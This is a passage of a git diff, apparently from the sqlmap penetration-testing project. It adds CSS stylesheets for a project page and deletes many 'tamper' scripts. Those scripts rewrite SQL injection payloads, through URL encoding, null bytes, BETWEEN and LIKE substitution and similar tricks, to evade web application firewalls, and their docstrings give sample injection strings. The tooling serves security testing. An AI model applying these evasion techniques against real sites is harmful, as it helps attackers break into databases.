# Set default logging level to debug - logger.setLevel(logging.DEBUG) - - # Initialize path variable - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() - - # Parse command line options - apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") - apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_DEFAULT_ADDRESS, action="store") - apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_DEFAULT_PORT, type="int", action="store") - apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default %s)" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") - (args, _) = apiparser.parse_args() - - # Start the client or the server - if args.server is True: - server(args.host, args.port, adapter=args.adapter) - elif args.client is True: - client(args.host, args.port) - else: - apiparser.print_help() - -if __name__ == "__main__": - main() diff --git a/stylesheets/print.css b/stylesheets/print.css new file mode 100644 index 00000000..541695bf --- /dev/null +++ b/stylesheets/print.css @@ -0,0 +1,226 @@ +html, body, div, span, applet, object, iframe, +h1, h2, h3, h4, h5, h6, p, blockquote, pre, +a, abbr, acronym, address, big, cite, code, +del, dfn, em, img, ins, kbd, q, s, samp, +small, strike, strong, sub, sup, tt, var, +b, u, i, center, +dl, dt, dd, ol, ul, li, +fieldset, form, label, legend, +table, caption, tbody, tfoot, thead, tr, th, td, +article, aside, canvas, details, embed, +figure, figcaption, footer, header, hgroup, +menu, nav, output, ruby, section, summary, +time, mark, audio, video { + margin: 0; + padding: 0; + border: 0; + font-size: 100%; + font: inherit; + vertical-align: baseline; +} +/* HTML5 display-role reset for older browsers */ +article, aside, details, figcaption, figure, +footer, header, hgroup, menu, nav, section { + display: block; +} +body { + line-height: 1; +} +ol, ul { + list-style: none; +} +blockquote, q { + quotes: none; +} +blockquote:before, blockquote:after, +q:before, q:after { + content: ''; + content: none; +} +table { + border-collapse: collapse; + border-spacing: 0; +} +body { + font-size: 13px; + line-height: 1.5; + font-family: 'Helvetica Neue', Helvetica, Arial, serif; + color: #000; +} + +a { + color: #d5000d; + font-weight: bold; +} + +header { + padding-top: 35px; + padding-bottom: 10px; +} + +header h1 { + font-weight: bold; + letter-spacing: -1px; + font-size: 48px; + color: #303030; + line-height: 1.2; +} + +header h2 { + letter-spacing: -1px; + font-size: 24px; + color: #aaa; + font-weight: normal; + line-height: 1.3; +} +#downloads { + display: none; +} +#main_content { + padding-top: 20px; +} + +code, pre { + font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal; + color: #222; + margin-bottom: 30px; + font-size: 12px; +} + +code { + padding: 0 3px; +} + +pre { + border: solid 1px #ddd; + padding: 20px; + overflow: auto; +} +pre code { + padding: 0; +} + +ul, ol, dl { + margin-bottom: 20px; +} + + +/* COMMON STYLES */ + +table { + width: 100%; + border: 1px solid #ebebeb; +} + +th { + font-weight: 500; +} + +td { + border: 1px solid #ebebeb; + text-align: center; + font-weight: 300; +} + +form { + background: #f2f2f2; + padding: 20px; + +} + + +/* GENERAL ELEMENT TYPE STYLES */ + +h1 { + font-size: 2.8em; +} + +h2 { + font-size: 22px; + font-weight: bold; + color: #303030; + margin-bottom: 8px; +} + +h3 { + color: #d5000d; + font-size: 18px; + font-weight: bold; + margin-bottom: 8px; +} + +h4 { + font-size: 16px; + color: #303030; + font-weight: bold; +} + +h5 { + font-size: 1em; + color: #303030; +} + +h6 { + font-size: .8em; + color: #303030; +} + +p { + font-weight: 300; + margin-bottom: 20px; +} + +a { + text-decoration: none; +} + +p a { + font-weight: 400; +} + +blockquote { + font-size: 1.6em; + border-left: 10px solid #e9e9e9; + margin-bottom: 20px; + padding: 0 0 0 30px; +} + +ul li { + list-style: disc inside; + padding-left: 20px; +} + +ol li { + list-style: decimal inside; + padding-left: 3px; +} + +dl dd { + font-style: italic; + font-weight: 100; +} + +footer { + margin-top: 40px; + padding-top: 20px; + padding-bottom: 30px; + font-size: 13px; + color: #aaa; +} + +footer a { + color: #666; +} + +/* MISC */ +.clearfix:after { + clear: both; + content: '.'; + display: block; + visibility: hidden; + height: 0; +} + +.clearfix {display: inline-block;} +* html .clearfix {height: 1%;} +.clearfix {display: block;} \ No newline at end of file diff --git a/stylesheets/pygment_trac.css b/stylesheets/pygment_trac.css new file mode 100644 index 00000000..c6a6452d --- /dev/null +++ b/stylesheets/pygment_trac.css @@ -0,0 +1,69 @@ +.highlight { background: #ffffff; } +.highlight .c { color: #999988; font-style: italic } /* Comment */ +.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */ +.highlight .k { font-weight: bold } /* Keyword */ +.highlight .o { font-weight: bold } /* Operator */ +.highlight .cm { color: #999988; font-style: italic } /* Comment.Multiline */ +.highlight .cp { color: #999999; font-weight: bold } /* Comment.Preproc */ +.highlight .c1 { color: #999988; font-style: italic } /* Comment.Single */ +.highlight .cs { color: #999999; font-weight: bold; font-style: italic } /* Comment.Special */ +.highlight .gd { color: #000000; background-color: #ffdddd } /* Generic.Deleted */ +.highlight .gd .x { color: #000000; background-color: #ffaaaa } /* Generic.Deleted.Specific */ +.highlight .ge { font-style: italic } /* Generic.Emph */ +.highlight .gr { color: #aa0000 } /* Generic.Error */ +.highlight .gh { color: #999999 } /* Generic.Heading */ +.highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */ +.highlight .gi .x { color: #000000; background-color: #aaffaa } /* Generic.Inserted.Specific */ +.highlight .go { color: #888888 } /* Generic.Output */ +.highlight .gp { color: #555555 } /* Generic.Prompt */ +.highlight .gs { font-weight: bold } /* Generic.Strong */ +.highlight .gu { color: #800080; font-weight: bold; } /* Generic.Subheading */ +.highlight .gt { color: #aa0000 } /* Generic.Traceback */ +.highlight .kc { font-weight: bold } /* Keyword.Constant */ +.highlight .kd { font-weight: bold } /* Keyword.Declaration */ +.highlight .kn { font-weight: bold } /* Keyword.Namespace */ +.highlight .kp { font-weight: bold } /* Keyword.Pseudo */ +.highlight .kr { font-weight: bold } /* Keyword.Reserved */ +.highlight .kt { color: #445588; font-weight: bold } /* Keyword.Type */ +.highlight .m { color: #009999 } /* Literal.Number */ +.highlight .s { color: #d14 } /* Literal.String */ +.highlight .na { color: #008080 } /* Name.Attribute */ +.highlight .nb { color: #0086B3 } /* Name.Builtin */ +.highlight .nc { color: #445588; font-weight: bold } /* Name.Class */ +.highlight .no { color: #008080 } /* Name.Constant */ +.highlight .ni { color: #800080 } /* Name.Entity */ +.highlight .ne { color: #990000; font-weight: bold } /* Name.Exception */ +.highlight .nf { color: #990000; font-weight: bold } /* Name.Function */ +.highlight .nn { color: #555555 } /* Name.Namespace */ +.highlight .nt { color: #000080 } /* Name.Tag */ +.highlight .nv { color: #008080 } /* Name.Variable */ +.highlight .ow { font-weight: bold } /* Operator.Word */ +.highlight .w { color: #bbbbbb } /* Text.Whitespace */ +.highlight .mf { color: #009999 } /* Literal.Number.Float */ +.highlight .mh { color: #009999 } /* Literal.Number.Hex */ +.highlight .mi { color: #009999 } /* Literal.Number.Integer */ +.highlight .mo { color: #009999 } /* Literal.Number.Oct */ +.highlight .sb { color: #d14 } /* Literal.String.Backtick */ +.highlight .sc { color: #d14 } /* Literal.String.Char */ +.highlight .sd { color: #d14 } /* Literal.String.Doc */ +.highlight .s2 { color: #d14 } /* Literal.String.Double */ +.highlight .se { color: #d14 } /* Literal.String.Escape */ +.highlight .sh { color: #d14 } /* Literal.String.Heredoc */ +.highlight .si { color: #d14 } /* Literal.String.Interpol */ +.highlight .sx { color: #d14 } /* Literal.String.Other */ +.highlight .sr { color: #009926 } /* Literal.String.Regex */ +.highlight .s1 { color: #d14 } /* Literal.String.Single */ +.highlight .ss { color: #990073 } /* Literal.String.Symbol */ +.highlight .bp { color: #999999 } /* Name.Builtin.Pseudo */ +.highlight .vc { color: #008080 } /* Name.Variable.Class */ +.highlight .vg { color: #008080 } /* Name.Variable.Global */ +.highlight .vi { color: #008080 } /* Name.Variable.Instance */ +.highlight .il { color: #009999 } /* Literal.Number.Integer.Long */ + +.type-csharp .highlight .k { color: #0000FF } +.type-csharp .highlight .kt { color: #0000FF } +.type-csharp .highlight .nf { color: #000000; font-weight: normal } +.type-csharp .highlight .nc { color: #2B91AF } +.type-csharp .highlight .nn { color: #000000 } +.type-csharp .highlight .s { color: #A31515 } +.type-csharp .highlight .sc { color: #A31515 } diff --git a/stylesheets/stylesheet.css b/stylesheets/stylesheet.css new file mode 100644 index 00000000..63d38e03 --- /dev/null +++ b/stylesheets/stylesheet.css @@ -0,0 +1,491 @@ +/* http://meyerweb.com/eric/tools/css/reset/ + v2.0 | 20110126 + License: none (public domain) +*/ +html, body, div, span, applet, object, iframe, +h1, h2, h3, h4, h5, h6, p, blockquote, pre, +a, abbr, acronym, address, big, cite, code, +del, dfn, em, img, ins, kbd, q, s, samp, +small, strike, sub, sup, tt, var, +b, u, i, center, +dl, dt, dd, ol, ul, li, +fieldset, form, label, legend, +table, caption, tbody, tfoot, thead, tr, th, td, +article, aside, canvas, details, embed, +figure, figcaption, footer, header, hgroup, +menu, nav, output, ruby, section, summary, +time, mark, audio, video { + margin: 0; + padding: 0; + border: 0; + font-size: 100%; + font: inherit; + vertical-align: baseline; +} +/* HTML5 display-role reset for older browsers */ +article, aside, details, figcaption, figure, +footer, header, hgroup, menu, nav, section { + display: block; +} +body { + line-height: 1; + text-align: justify; +} +ol, ul { + list-style: none; +} +blockquote, q { + quotes: none; +} +blockquote:before, blockquote:after, +q:before, q:after { + content: ''; + content: none; +} +table { + border-collapse: collapse; + border-spacing: 0; +} + +/* LAYOUT STYLES */ +body { + font-size: 15px; + line-height: 1.5; + background: #fafafa url(../images/body-bg.jpg) 0 0 repeat; + font-family: 'Helvetica Neue', Helvetica, Arial, serif; + font-weight: 400; + color: #666; +} + +a { + color: #2879d0; +} +a:hover { + color: #2268b2; +} + +header { + padding-top: 40px; + padding-bottom: 40px; + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + background: #2e7bcf url(../images/header-bg.jpg) 0 0 repeat-x; + border-bottom: solid 1px #275da1; +} + +header h1 { + letter-spacing: -1px; + font-size: 72px; + color: #fff; + line-height: 1; + margin-bottom: 0.2em; + width: 540px; +} + +header h2 { + font-size: 26px; + color: #9ddcff; + font-weight: normal; + line-height: 1.3; + width: 540px; + letter-spacing: 0; +} + +.inner { + position: relative; + width: 940px; + margin: 0 auto; +} + +#content-wrapper { + border-top: solid 1px #fff; + padding-top: 30px; +} + +#main-content { + width: 690px; + float: left; +} + +#main-content img { + max-width: 100%; +} + +aside#sidebar { + width: 200px; + padding-left: 20px; + min-height: 504px; + float: right; + background: transparent url(../images/sidebar-bg.jpg) 0 0 no-repeat; + font-size: 12px; + line-height: 1.3; +} + +aside#sidebar p.repo-owner, +aside#sidebar p.repo-owner a { + font-weight: bold; +} + +#downloads { + margin-bottom: 40px; +} + +a.button { + width: 134px; + height: 58px; + line-height: 1.2; + font-size: 23px; + color: #fff; + padding-left: 68px; + padding-top: 22px; + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; +} +a.button small { + display: block; + font-size: 11px; +} +header a.button { + position: absolute; + right: 0; + top: 0; + background: transparent url(../images/github-button.png) 0 0 no-repeat; +} +aside a.button { + width: 138px; + padding-left: 64px; + display: block; + background: transparent url(../images/download-button.png) 0 0 no-repeat; + margin-bottom: 20px; + font-size: 21px; +} + +code, pre { + font-family: monospace, serif; + _font-family: 'courier new', monospace; + color: #222; + font-size: 13px; +} + +code { + background-color: #f2f8fc; + border: solid 1px #dbe7f3; + padding: 0 3px; +} + +pre { + padding: 20px; + background: #fff; + text-shadow: none; + overflow: auto; + border: solid 1px #f2f2f2; +} +pre code { + color: #2879d0; + background-color: #fff; + border: none; + padding: 0; +} + +ul, ol, dl { + margin-bottom: 20px; +} + + +/* COMMON STYLES */ + +hr { + height: 1px; + line-height: 1px; + margin-top: 1em; + padding-bottom: 1em; + border: none; + background: transparent url('../images/hr.png') 0 0 no-repeat; +} + +table { + width: 100%; + border: 1px solid #ebebeb; +} + +th { + font-weight: 500; +} + +td { + border: 1px solid #ebebeb; + text-align: center; + font-weight: 300; +} + +form { + background: #f2f2f2; + padding: 20px; + +} + + +/* GENERAL ELEMENT TYPE STYLES */ + +#main-content h1 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 2.8em; + letter-spacing: -1px; + color: #474747; +} + +#main-content h1:before { + content: "';"; + color: #ff2020; + padding-right: 0.3em; + margin-left: -0.9em; +} + +#main-content h1:after { + content: "();--"; + color: #ff2020; + padding-left: 0.1em; + margin-right: -0.9em; +} + +#main-content h2 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 22px; + font-weight: bold; + margin-bottom: 8px; + color: #474747; +} +#main-content h2:before { + content: "//"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -1.5em; +} + +#main-content h3 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 18px; + font-weight: bold; + margin-top: 24px; + margin-bottom: 8px; + color: #474747; +} + +#main-content h3:before { + content: "///"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -2em; +} + +#main-content h4 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 15px; + font-weight: bold; + color: #474747; +} + +h4:before { + content: "////"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -2.8em; +} + +#main-content h5 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: 14px; + color: #474747; +} +h5:before { + content: "/////"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -3.2em; +} + +#main-content h6 { + font-family: 'Architects Daughter', 'Helvetica Neue', Helvetica, Arial, serif; + font-size: .8em; + color: #474747; +} +h6:before { + content: "//////"; + color: #9ddcff; + padding-right: 0.3em; + margin-left: -3.7em; +} + +p { + margin-bottom: 20px; +} + +a { + text-decoration: none; +} + +p a { + font-weight: 400; +} + +blockquote { + font-size: 1.6em; + border-left: 10px solid #e9e9e9; + margin-bottom: 20px; + padding: 0 0 0 30px; +} + +ul li { + list-style: disc inside; +/* padding-left: 20px; */ +} + +ol li { + list-style: decimal inside; +/* padding-left: 3px; */ +} + +dl dd { + font-style: italic; + font-weight: 100; +} + +footer { + background: transparent url('../images/hr.png') 0 0 no-repeat; + margin-top: 40px; + padding-top: 20px; + padding-bottom: 30px; + font-size: 13px; + color: #aaa; +} + +footer a { + color: #666; +} +footer a:hover { + color: #444; +} + +/* MISC */ +.clearfix:after { + clear: both; + content: '.'; + display: block; + visibility: hidden; + height: 0; +} + +.clearfix {display: inline-block;} +* html .clearfix {height: 1%;} +.clearfix {display: block;} + +/* #Media Queries +================================================== */ + +/* Smaller than standard 960 (devices and browsers) */ +@media only screen and (max-width: 959px) {} + +/* Tablet Portrait size to standard 960 (devices and browsers) */ +@media only screen and (min-width: 768px) and (max-width: 959px) { + .inner { + width: 740px; + } + header h1, header h2 { + width: 340px; + } + header h1 { + font-size: 60px; + } + header h2 { + font-size: 30px; + } + #main-content { + width: 490px; + } + #main-content h1:before, + #main-content h2:before, + #main-content h3:before, + #main-content h4:before, + #main-content h5:before, + #main-content h6:before { + content: none; + padding-right: 0; + margin-left: 0; + } +} + +/* All Mobile Sizes (devices and browser) */ +@media only screen and (max-width: 767px) { + .inner { + width: 93%; + } + header { + padding: 20px 0; + } + header .inner { + position: relative; + } + header h1, header h2 { + width: 100%; + } + header h1 { + font-size: 48px; + } + header h2 { + font-size: 24px; + } + header a.button { + background-image: none; + width: auto; + height: auto; + display: inline-block; + margin-top: 15px; + padding: 5px 10px; + position: relative; + text-align: center; + font-size: 13px; + line-height: 1; + background-color: #9ddcff; + color: #2879d0; + -moz-border-radius: 5px; + -webkit-border-radius: 5px; + border-radius: 5px; + } + header a.button small { + font-size: 13px; + display: inline; + } + #main-content, + aside#sidebar { + float: none; + width: 100% ! important; + } + aside#sidebar { + background-image: none; + margin-top: 20px; + border-top: solid 1px #ddd; + padding: 20px 0; + min-height: 0; + } + aside#sidebar a.button { + display: none; + } + aside#sidebar div#timeline { + display: none; + } + #main-content h1:before, + #main-content h1:after, + #main-content h2:before, + #main-content h3:before, + #main-content h4:before, + #main-content h5:before, + #main-content h6:before { + content: none; + padding-right: 0; + margin-left: 0; + } +} + +/* Mobile Landscape Size to Tablet Portrait (devices and browsers) */ +@media only screen and (min-width: 480px) and (max-width: 767px) {} + +/* Mobile Portrait Size to Mobile Landscape Size (devices and browsers) */ +@media only screen and (max-width: 479px) {} diff --git a/tamper/__init__.py b/tamper/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/tamper/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py deleted file mode 100644 index 1fa66457..00000000 --- a/tamper/apostrophemask.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces apostrophe character with its UTF-8 full width counterpart - - References: - * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 - * http://lukasz.pilorz.net/testy/unicode_conversion/ - * http://sla.ckers.org/forum/read.php?13,11562,11850 - * http://lukasz.pilorz.net/testy/full_width_utf/index.phps - - >>> tamper("1 AND '1'='1") - '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' - """ - - return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py deleted file mode 100644 index 5d01f824..00000000 --- a/tamper/apostrophenullencode.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces apostrophe character with its illegal double unicode counterpart - - >>> tamper("1 AND '1'='1") - '1 AND %00%271%00%27=%00%271' - """ - - return payload.replace('\'', "%00%27") if payload else payload diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py deleted file mode 100644 index 2694b98b..00000000 --- a/tamper/appendnullbyte.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends encoded NULL byte character at the end of payload - - Requirement: - * Microsoft Access - - Notes: - * Useful to bypass weak web application firewalls when the back-end - database management system is Microsoft Access - further uses are - also possible - - Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection - - >>> tamper('1 AND 1=1') - '1 AND 1=1%00' - """ - - return "%s%%00" % payload if payload else payload diff --git a/tamper/base64encode.py b/tamper/base64encode.py deleted file mode 100644 index 6dbdc9c7..00000000 --- a/tamper/base64encode.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import base64 - -from lib.core.enums import PRIORITY -from lib.core.settings import UNICODE_ENCODING - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Base64 all characters in a given payload - - >>> tamper("1' AND SLEEP(5)#") - 'MScgQU5EIFNMRUVQKDUpIw==' - """ - - return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload diff --git a/tamper/between.py b/tamper/between.py deleted file mode 100644 index 620ba435..00000000 --- a/tamper/between.py +++ /dev/null @@ -1,59 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' - Replaces equals operator ('=') with 'BETWEEN # AND #' - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The BETWEEN clause is SQL standard. Hence, this tamper script - should work against all (?) databases - - >>> tamper('1 AND A > B--') - '1 AND A NOT BETWEEN 0 AND B--' - >>> tamper('1 AND A = B--') - '1 AND A BETWEEN B AND B--' - """ - - retVal = payload - - if payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - - if match: - _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) - retVal = retVal.replace(match.group(0), _) - else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload) - - if retVal == payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload) - - if match: - _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) - retVal = retVal.replace(match.group(0), _) - - - return retVal diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py deleted file mode 100644 index 92d4eea4..00000000 --- a/tamper/bluecoat.py +++ /dev/null @@ -1,51 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character after SQL statement with a valid random blank character. - Afterwards replace character = with LIKE operator - - Requirement: - * Blue Coat SGOS with WAF activated as documented in - https://kb.bluecoat.com/index?page=content&id=FAQ2147 - - Tested against: - * MySQL 5.1, SGOS - - Notes: - * Useful to bypass Blue Coat's recommended WAF rule configuration - - >>> tamper('SELECT id FROM users WHERE id = 1') - 'SELECT%09id FROM%09users WHERE%09id LIKE 1' - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords: - return match.group().replace(word, "%s%%09" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"\b(?P[A-Z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) - retVal = retVal.replace("%09 ", "%09") - - return retVal diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py deleted file mode 100644 index f7d6b31c..00000000 --- a/tamper/chardoubleencode.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Double url-encodes all characters in a given payload (not processing - already encoded) - - Notes: - * Useful to bypass some weak web application firewalls that do not - double url-decode the request before processing it through their - ruleset - - >>> tamper('SELECT FIELD FROM%20TABLE') - '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += '%%25%s' % payload[i + 1:i + 3] - i += 3 - else: - retVal += '%%25%.2X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/tamper/charencode.py b/tamper/charencode.py deleted file mode 100644 index 4345eb35..00000000 --- a/tamper/charencode.py +++ /dev/null @@ -1,52 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Url-encodes all characters in a given payload (not processing already - encoded) - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak web application firewalls that do not - url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, - hence it should work against any DBMS - - >>> tamper('SELECT FIELD FROM%20TABLE') - '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 - else: - retVal += '%%%.2X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py deleted file mode 100644 index f811578d..00000000 --- a/tamper/charunicodeencode.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import string - -from lib.core.enums import PRIORITY -from lib.core.common import singleTimeWarnMessage - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0]) - -def tamper(payload, **kwargs): - """ - Unicode-url-encodes non-encoded characters in a given payload (not - processing already encoded) - - Requirement: - * ASP - * ASP.NET - - Tested against: - * Microsoft SQL Server 2000 - * Microsoft SQL Server 2005 - * MySQL 5.1.56 - * PostgreSQL 9.0.3 - - Notes: - * Useful to bypass weak web application firewalls that do not - unicode url-decode the request before processing it through their - ruleset - - >>> tamper('SELECT FIELD%20FROM TABLE') - '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += "%%u00%s" % payload[i + 1:i + 3] - i += 3 - else: - retVal += '%%u%.4X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py deleted file mode 100644 index 6bc771a2..00000000 --- a/tamper/commalessmid.py +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGH - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 and 5.5 - - >>> tamper('MID(VERSION(), 1, 1)') - 'MID(VERSION() FROM 1 FOR 1)' - """ - - retVal = payload - - warnMsg = "you should consider usage of switch '--no-cast' along with " - warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] - singleTimeWarnMessage(warnMsg) - - match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") - if match: - retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) - - return retVal diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py deleted file mode 100644 index d46321f9..00000000 --- a/tamper/concat2concatws.py +++ /dev/null @@ -1,36 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the CONCAT() function - - >>> tamper('CONCAT(1,2)') - 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' - """ - - if payload: - payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") - - return payload diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py deleted file mode 100644 index 49f19100..00000000 --- a/tamper/equaltolike.py +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying 